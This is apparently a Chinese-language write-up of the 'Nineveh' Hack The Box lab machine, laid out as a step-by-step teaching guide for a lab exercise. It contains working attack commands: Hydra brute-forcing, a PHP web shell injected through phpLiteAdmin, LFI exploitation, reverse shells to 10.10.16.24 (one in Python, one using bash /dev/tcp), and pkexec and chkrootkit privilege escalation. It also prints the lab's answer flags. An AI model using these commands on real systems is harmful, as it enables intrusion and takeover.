[Meachines] [Medium] nineveh phpLiteAdmin代码注入+LFI(pany)文件读取+Ports Knocking+TRP00F权限提升+chkrootkit权限提升
字数 891 2025-08-19 12:40:41

Nineveh渗透测试实战教学文档

1. 信息收集阶段

1.1 初始扫描

使用Nmap进行端口扫描:

nmap -p- 10.10.10.43 --min-rate 1000 -sV -sC

发现开放端口:

  • 80/tcp: HTTP服务 (Apache/2.4.18)
  • 443/tcp: HTTPS服务 (Apache/2.4.18)

1.2 Web目录枚举

使用Gobuster进行目录扫描:

gobuster dir -u 'https://10.10.10.43' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html -k

发现重要目录:

  • /db/: phpLiteAdmin管理界面

2. phpLiteAdmin漏洞利用

2.1 暴力破解登录

使用Hydra进行密码爆破:

hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect password."

成功凭证:

  • 用户名: admin
  • 密码: password123

2.2 代码注入攻击

  1. 创建rev.php表
  2. 创建字段,类型设置为TEXT
  3. 在默认值中输入PHP代码:
<?php system($_GET[1]);?>
  1. 通过LFI访问注入的文件:
https://10.10.10.43/db/index.php?switchdb=%2Fvar%2Ftmp%2Frev

3. 本地文件包含(LFI)利用

3.1 发现LFI漏洞

使用Gobuster扫描HTTP服务:

gobuster dir -u 'http://10.10.10.43/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 403,404 -x php,txt,html

发现登录页面:

  • /department/login.php

3.2 暴力破解登录

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password\!"

成功凭证:

  • 用户名: admin
  • 密码: 1q2w3e4r5t

3.3 利用pany工具进行LFI

使用pany.py工具进行LFI利用:

python3 pany.py -u 'http://10.10.10.43/department/manage.php?notes=/ninevehNotes/*' --cookie "PHPSESSID=o9gl3hqas474agdtlemcgscn50;"

4. 获取初始Shell

通过LFI执行反向Shell:

curl 'http://10.10.10.43/department/manage.php?notes=/ninevehNotes/var/tmp/rev.php&1=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.16.24%22%2C10034%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27' --cookie "PHPSESSID=o9gl3hqas474agdtlemcgscn50;"

5. 端口敲门(Port Knocking)

5.1 查看knockd配置

cat /etc/knockd.conf

5.2 执行端口敲门

knock 10.10.10.43 571 290 911 -d 300 -v

5.3 获取SSH密钥

strings /var/www/ssl/secure_notes/nineveh.png

5.4 通过SSH登录

ssh -i id_rsa amrois@10.10.10.43

获取user flag:

56e41c6deea1a000bba08a2bd96c364c

6. 权限提升

6.1 使用TRP00F自动化提权

python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

选择利用pkexec漏洞:

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

6.2 利用chkrootkit提权

  1. 创建恶意update文件:
echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.24/10035 0>&1'">/tmp/update
chmod 777 /tmp/update
  1. 等待chkrootkit执行

获取root flag:

508ffee94c9c1c12a1ec833ae97b93bb

7. 总结

本次渗透测试完整流程:

  1. 信息收集发现phpLiteAdmin
  2. 暴力破解phpLiteAdmin登录
  3. 通过phpLiteAdmin注入PHP代码
  4. 发现并利用LFI漏洞
  5. 通过端口敲门获取SSH访问
  6. 使用自动化工具和chkrootkit漏洞进行权限提升

关键点:

  • phpLiteAdmin的代码注入
  • LFI漏洞的利用
  • 端口敲门机制的绕过
  • 多种权限提升方法的组合使用
Nineveh渗透测试实战教学文档 1. 信息收集阶段 1.1 初始扫描 使用Nmap进行端口扫描: 发现开放端口: 80/tcp: HTTP服务 (Apache/2.4.18) 443/tcp: HTTPS服务 (Apache/2.4.18) 1.2 Web目录枚举 使用Gobuster进行目录扫描: 发现重要目录: /db/ : phpLiteAdmin管理界面 2. phpLiteAdmin漏洞利用 2.1 暴力破解登录 使用Hydra进行密码爆破: 成功凭证: 用户名: admin 密码: password123 2.2 代码注入攻击 创建rev.php表 创建字段,类型设置为TEXT 在默认值中输入PHP代码: 通过LFI访问注入的文件: 3. 本地文件包含(LFI)利用 3.1 发现LFI漏洞 使用Gobuster扫描HTTP服务: 发现登录页面: /department/login.php 3.2 暴力破解登录 成功凭证: 用户名: admin 密码: 1q2w3e4r5t 3.3 利用pany工具进行LFI 使用pany.py工具进行LFI利用: 4. 获取初始Shell 通过LFI执行反向Shell: 5. 端口敲门(Port Knocking) 5.1 查看knockd配置 5.2 执行端口敲门 5.3 获取SSH密钥 5.4 通过SSH登录 获取user flag: 6. 权限提升 6.1 使用TRP00F自动化提权 选择利用pkexec漏洞: 6.2 利用chkrootkit提权 创建恶意update文件: 等待chkrootkit执行 获取root flag: 7. 总结 本次渗透测试完整流程: 信息收集发现phpLiteAdmin 暴力破解phpLiteAdmin登录 通过phpLiteAdmin注入PHP代码 发现并利用LFI漏洞 通过端口敲门获取SSH访问 使用自动化工具和chkrootkit漏洞进行权限提升 关键点: phpLiteAdmin的代码注入 LFI漏洞的利用 端口敲门机制的绕过 多种权限提升方法的组合使用